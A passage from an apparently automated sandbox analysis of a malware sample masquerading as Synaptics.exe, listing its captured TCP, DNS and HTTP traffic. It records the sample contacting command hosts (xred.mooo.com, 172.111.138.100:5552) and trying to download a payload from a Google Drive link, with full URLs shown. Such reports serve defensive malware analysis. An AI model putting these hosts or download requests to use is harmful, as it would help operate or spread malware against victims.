                                                                                                                                                      Dec 30, 2024 11:26:53.031398058 CET555250148172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:26:55.173891068 CET555250148172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:26:55.174015999 CET501485552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:26:55.229685068 CET501485552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:26:55.234601021 CET555250148172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:02.067910910 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:02.073318958 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:02.073724985 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:02.074136972 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:02.079438925 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:04.202567101 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:04.204536915 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:04.357790947 CET501495552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:04.362580061 CET555250149172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:11.130283117 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:11.135232925 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:11.135335922 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:11.135834932 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:11.140701056 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:13.268107891 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:13.268174887 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:13.276967049 CET501505552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:13.281816959 CET555250150172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:20.193216085 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:20.198203087 CET555250151172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:20.198323965 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:20.198693037 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:20.203527927 CET555250151172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:22.326292038 CET555250151172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:27:22.326443911 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:22.401516914 CET501515552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:27:22.406456947 CET555250151172.111.138.100192.168.2.11

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Dec 30, 2024 11:25:28.577290058 CET6343153192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:28.583918095 CET53634311.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.332200050 CET5847253192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:29.339827061 CET53584721.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.563576937 CET5160653192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:29.571126938 CET53516061.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.018539906 CET6521853192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:30.027192116 CET53652181.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.852538109 CET6217353192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:33.860358000 CET53621731.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:39.537209034 CET6515353192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:39.544121027 CET53651531.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:44.303896904 CET5873153192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:44.311129093 CET53587311.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:49.977374077 CET6098853192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:49.984791994 CET53609881.1.1.1192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:54.716708899 CET5616953192.168.2.111.1.1.1
                                                                                                                                                      Dec 30, 2024 11:25:54.724001884 CET53561691.1.1.1192.168.2.11

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Dec 30, 2024 11:25:28.577290058 CET192.168.2.111.1.1.10x329aStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:29.332200050 CET192.168.2.111.1.1.10x5cf1Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:29.563576937 CET192.168.2.111.1.1.10x976dStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:30.018539906 CET192.168.2.111.1.1.10x9888Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:33.852538109 CET192.168.2.111.1.1.10xb09fStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:39.537209034 CET192.168.2.111.1.1.10x6b78Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:44.303896904 CET192.168.2.111.1.1.10xab73Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:49.977374077 CET192.168.2.111.1.1.10xb4c4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:54.716708899 CET192.168.2.111.1.1.10xfd71Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Dec 30, 2024 11:25:28.583918095 CET1.1.1.1192.168.2.110x329aNo error (0)docs.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:29.339827061 CET1.1.1.1192.168.2.110x5cf1Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:29.571126938 CET1.1.1.1192.168.2.110x976dNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:30.027192116 CET1.1.1.1192.168.2.110x9888No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:33.860358000 CET1.1.1.1192.168.2.110xb09fName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:39.544121027 CET1.1.1.1192.168.2.110x6b78Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:44.311129093 CET1.1.1.1192.168.2.110xab73Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:49.984791994 CET1.1.1.1192.168.2.110xb4c4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 30, 2024 11:25:54.724001884 CET1.1.1.1192.168.2.110xfd71Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • docs.google.com
                                                                                                                                                      • drive.usercontent.google.com
                                                                                                                                                      • freedns.afraid.org

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.114976969.42.215.252807604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Dec 30, 2024 11:25:29.590995073 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                      User-Agent: MyApp
                                                                                                                                                      Host: freedns.afraid.org
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Dec 30, 2024 11:25:30.160239935 CET243INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      X-Cache: MISS
                                                                                                                                                      Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.1149761172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-t-GYB-nshLIcZbAs_SDSVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.1149762172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ugYRQS8AtO7RjYSwSJlpPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.1149775172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xrgjVyWloGlw4dSXHt023g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.1149776172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-s-W3Iy3vLYPE8vZr59oW2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      4192.168.2.1149777142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:30 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:31 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7i4MQtD9Ake8Wr9tEyyzKob5HgInf11gkcX8rtRC9q6QwrsjCZgMvIS1LlO2jdfQje
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HvIfQy8YkY4HDxDIZggC9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL; expires=Tue, 01-Jul-2025 10:25:30 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:31 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 6f 72 6b 75 64 55 4c 68 42 7a 72 4f 58 41 32 6b 58 79 70 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oorkudULhBzrOXA2kXypSg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:31 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      5192.168.2.1149778142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:30 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:31 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6j55qK_y6oQQV458QiXo80s2gdu4r-lYkJHRlTVUYK3rhSviOGeuHNQw4jgxA-gGnW
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zo98B5bG0X0E5uvAstvLog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:31 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 36 5f 6d 54 4f 4a 78 5f 6f 4c 30 5a 43 66 33 59 72 68 58 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L6_mTOJx_oL0ZCf3YrhXpQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:31 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      6192.168.2.1149787172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
